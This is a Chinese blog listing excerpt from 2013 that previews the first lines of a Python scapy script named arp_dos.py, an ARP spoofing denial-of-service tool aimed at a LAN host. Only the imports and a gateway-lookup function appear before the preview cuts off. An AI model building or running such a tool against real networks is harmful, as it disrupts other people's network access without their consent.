摘要: 注:使用这个脚本需要安装scapy 包 最好在linux平台下使用,因为scapy包在windows上安装老是会有各种问题 1 #coding:utf-8 2 #example :sudo python arp_dos.py 192.168.1.103 3 4 from scapy.all import ARP,send 5 import os,re,sys 6 7 def get_gateway_ip(): 8 t=os.popen('route -n') 9 for i in t:10 if i.startswith('0.0.0.0'):11 ... 阅读全文
posted @ 2013-10-27 21:38 r3call 阅读(7082) 评论(1) 推荐(0) 编辑